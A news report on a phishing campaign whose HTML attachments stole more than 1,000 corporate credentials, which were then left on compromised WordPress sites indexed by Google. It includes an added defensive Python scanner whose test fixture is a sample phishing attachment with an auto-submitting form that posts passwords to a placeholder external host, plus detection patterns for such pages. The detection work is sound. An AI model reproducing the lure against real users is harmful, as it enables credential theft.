Fraudsters behind a phishing scam that targeted employees of companies in the construction and energy industries had their plans ruined when they carelessly left the passwords they stole on compromised WordPress-hosted domains, where Google indexed them and made the credentials accessible to anyone using the search engine. A team of researchers reported the discovery of the stolen credentials on Thursday.
The fraudsters sent scam emails in several formats to employees of the targeted companies, going to considerable lengths to make the emails look genuine. The emails often included the employees’ names and titles and were made to look like notifications from Xerox.
What the recipients could not have known is that the emails carried an HTML attachment coded to steal their passwords and other login credentials. The attackers managed to get past Office 365’s Advanced Threat Protection (ATP) filtering. More than 1,000 victims, employees of different companies, had their login details pilfered, according to reports.
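As an added example that is not part of the original article or the researchers’ tooling, the following Python script shows the kind of mail-gateway check a defender can run against the lure described above: it extracts HTML attachments from an .eml message and flags the traits of a credential-harvesting page (a password input, a form that posts to a host outside the organisation, and script-driven submission). The sample message, host names and file name are constructed placeholders, and the trusted-host list is an assumption.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample (not from the original report): a fake scanner notification
# carrying an HTML attachment whose form posts credentials to an external site.
SAMPLE_EML = """\
From: scanner@example-notifications.invalid
To: jane.doe@example-construction.invalid
Subject: Scanned document for Jane Doe, Project Manager
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="part-boundary"

--part-boundary
Content-Type: text/plain

Your scanned document is attached.
--part-boundary
Content-Type: text/html; name="scan_2021.html"
Content-Disposition: attachment; filename="scan_2021.html"

<html><body>
<p>Sign in to view your document.</p>
<form id="f" action="https://example-wordpress-site.invalid/wp-content/collect.php" method="post">
<input type="email" name="user" value="jane.doe@example-construction.invalid">
<input type="password" name="pass">
</form>
<script>document.getElementById("f").submit();</script>
</body></html>
--part-boundary--
"""

# Constructed benign attachment used as a control.
BENIGN_HTML = "<html><body><p>Meeting notes for Monday.</p></body></html>"

PASSWORD_FIELD = re.compile(r'<input[^>]+type\s*=\s*["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)
JS_SUBMIT = re.compile(r'(XMLHttpRequest|fetch\s*\(|\.submit\s*\()', re.I)
OBFUSCATION = re.compile(r'(atob\s*\(|unescape\s*\(|String\.fromCharCode)', re.I)


def html_attachments(raw_message):
    """Return (filename, decoded_html) for every text/html attachment in the message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        # Inline HTML bodies are normal; only detached HTML files are of interest here.
        if part.get_content_disposition() != "attachment" and not part.get_filename():
            continue
        found.append((part.get_filename() or "(unnamed)", part.get_content()))
    return found


def assess_html(name, html, trusted_hosts):
    """List the credential-harvesting traits present in one HTML attachment."""
    findings = []
    if PASSWORD_FIELD.search(html):
        findings.append("password input field")
    for match in FORM_ACTION.finditer(html):
        host = urlparse(match.group(1)).hostname or ""
        if host and host not in trusted_hosts:
            findings.append(f"form posts to external host {host}")
    if JS_SUBMIT.search(html):
        findings.append("script-driven submission")
    if OBFUSCATION.search(html):
        findings.append("decoding/obfuscation primitives")
    return findings


def scan_message(raw_message, trusted_hosts=()):
    """Map each HTML attachment's filename to its list of suspicious traits."""
    trusted = set(trusted_hosts)
    return {name: assess_html(name, html, trusted) for name, html in html_attachments(raw_message)}


if __name__ == "__main__":
    # Assumed: the organisation's own sign-in host, which a legitimate form may target.
    for name, traits in scan_message(SAMPLE_EML, {"login.example-construction.invalid"}).items():
        verdict = "SUSPICIOUS" if traits else "clean"
        print(f"{name}: {verdict} {traits}")
```

Any attachment with a password field plus a form action outside the organisation is worth quarantining regardless of how convincing the surrounding email looks; the regexes are deliberately loose so that attribute quoting or case variations do not slip past.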
The attackers also compromised a number of WordPress-hosted websites. They stored the stolen credentials on these sites and processed each batch as it arrived. Because the sites are indexed by Google, this step made the stolen credentials available to anyone with access to the Google search engine, ZDNet reports.
The team stated that the attackers knew their own websites would most likely be flagged by security filtering, so they hijacked websites with good reputations in order to slip past security protections.
“They knew the bad reputations of their own websites will make it difficult to bypass security protections, so they opted for websites that have good reputations,” the team wrote.
According to the team’s report published on Thursday, after checking about half of the credentials stored on the compromised websites, the team found that the attackers did not limit their attack to employees of the construction and energy industries, though they showed a preference for them. The attackers had also stolen credentials from employees in the information technology, real estate, healthcare and manufacturing industries.
The team also found that the attackers had been active since at least August 2020. They reached this conclusion by comparing the emails with ones from another phishing campaign from August 2020 and finding that the JavaScript used to encode the emails in the two campaigns is the same.
Source: bleepingcomputer.com